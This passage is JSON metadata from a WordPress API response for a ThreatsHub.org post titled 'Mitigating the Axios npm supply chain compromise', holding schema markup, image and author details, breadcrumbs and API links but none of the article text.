100% Free OSINT Threat Intelligent and Cybersecurity News.","og_url":"https:\/\/www.threatshub.org\/blog\/mitigating-the-axios-npm-supply-chain-compromise\/","og_site_name":"ThreatsHub Cybersecurity News","article_published_time":"2026-04-01T21:00:00+00:00","og_image":[{"width":432,"height":435,"url":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2025\/05\/Threatshub_Favicon1.jpg","type":"image\/jpeg"}],"author":"TH Author","twitter_card":"summary_large_image","twitter_creator":"@threatshub","twitter_site":"@threatshub","twitter_misc":{"Written by":"TH Author","Est. reading time":"20 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.threatshub.org\/blog\/mitigating-the-axios-npm-supply-chain-compromise\/#article","isPartOf":{"@id":"https:\/\/www.threatshub.org\/blog\/mitigating-the-axios-npm-supply-chain-compromise\/"},"author":{"name":"TH Author","@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/person\/12e0a8671ff89a863584f193e7062476"},"headline":"Mitigating the Axios npm supply chain compromise","datePublished":"2026-04-01T21:00:00+00:00","mainEntityOfPage":{"@id":"https:\/\/www.threatshub.org\/blog\/mitigating-the-axios-npm-supply-chain-compromise\/"},"wordCount":3448,"publisher":{"@id":"https:\/\/www.threatshub.org\/blog\/#organization"},"image":{"@id":"https:\/\/www.threatshub.org\/blog\/mitigating-the-axios-npm-supply-chain-compromise\/#primaryimage"},"thumbnailUrl":"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2026\/04\/image.webp","keywords":["Linux","macOS","Sleet","Windows"],"articleSection":["Microsoft Secure"],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https:\/\/www.threatshub.org\/blog\/mitigating-the-axios-npm-supply-chain-compromise\/","url":"https:\/\/www.threatshub.org\/blog\/mitigating-the-axios-npm-supply-chain-compromise\/","name":"Mitigating the Axios npm supply chain compromise 2026 | ThreatsHub Cybersecurity 
News","isPartOf":{"@id":"https:\/\/www.threatshub.org\/blog\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.threatshub.org\/blog\/mitigating-the-axios-npm-supply-chain-compromise\/#primaryimage"},"image":{"@id":"https:\/\/www.threatshub.org\/blog\/mitigating-the-axios-npm-supply-chain-compromise\/#primaryimage"},"thumbnailUrl":"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2026\/04\/image.webp","datePublished":"2026-04-01T21:00:00+00:00","description":"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.","breadcrumb":{"@id":"https:\/\/www.threatshub.org\/blog\/mitigating-the-axios-npm-supply-chain-compromise\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.threatshub.org\/blog\/mitigating-the-axios-npm-supply-chain-compromise\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.threatshub.org\/blog\/mitigating-the-axios-npm-supply-chain-compromise\/#primaryimage","url":"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2026\/04\/image.webp","contentUrl":"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2026\/04\/image.webp"},{"@type":"BreadcrumbList","@id":"https:\/\/www.threatshub.org\/blog\/mitigating-the-axios-npm-supply-chain-compromise\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/www.threatshub.org\/blog\/"},{"@type":"ListItem","position":2,"name":"Linux","item":"https:\/\/www.threatshub.org\/blog\/tag\/linux\/"},{"@type":"ListItem","position":3,"name":"Mitigating the Axios npm supply chain compromise"}]},{"@type":"WebSite","@id":"https:\/\/www.threatshub.org\/blog\/#website","url":"https:\/\/www.threatshub.org\/blog\/","name":"ThreatsHub Cybersecurity News","description":"%%focuskw%% Threat Intel \u2013 Threat Intel Services \u2013 CyberIntelligence \u2013 
Cyber Threat Intelligence - Threat Intelligence Feeds - Threat Intelligence Reports - CyberSecurity Report \u2013 Cyber Security PDF \u2013 Cybersecurity Trends - Cloud Sandbox \u2013- Threat IntelligencePortal \u2013 Incident Response \u2013 Threat Hunting \u2013 IOC - Yara - Security Operations Center \u2013 SecurityOperation Center \u2013 Security SOC \u2013 SOC Services - Advanced Threat - Threat Detection - TargetedAttack \u2013 APT \u2013 Anti-APT \u2013 Advanced Protection \u2013 Cyber Security Services \u2013 Cybersecurity Services -Threat Intelligence Platform","publisher":{"@id":"https:\/\/www.threatshub.org\/blog\/#organization"},"alternateName":"Threatshub.org","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.threatshub.org\/blog\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/www.threatshub.org\/blog\/#organization","name":"ThreatsHub.org","alternateName":"Threatshub.org","url":"https:\/\/www.threatshub.org\/blog\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/logo\/image\/","url":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2025\/05\/Threatshub_Favicon1.jpg","contentUrl":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2025\/05\/Threatshub_Favicon1.jpg","width":432,"height":435,"caption":"ThreatsHub.org"},"image":{"@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/x.com\/threatshub"]},{"@type":"Person","@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/person\/12e0a8671ff89a863584f193e7062476","name":"TH 
Author","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g","caption":"TH Author"}}]}},"_links":{"self":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts\/60413","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/comments?post=60413"}],"version-history":[{"count":0,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts\/60413\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/media?parent=60413"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/categories?post=60413"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/tags?post=60413"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}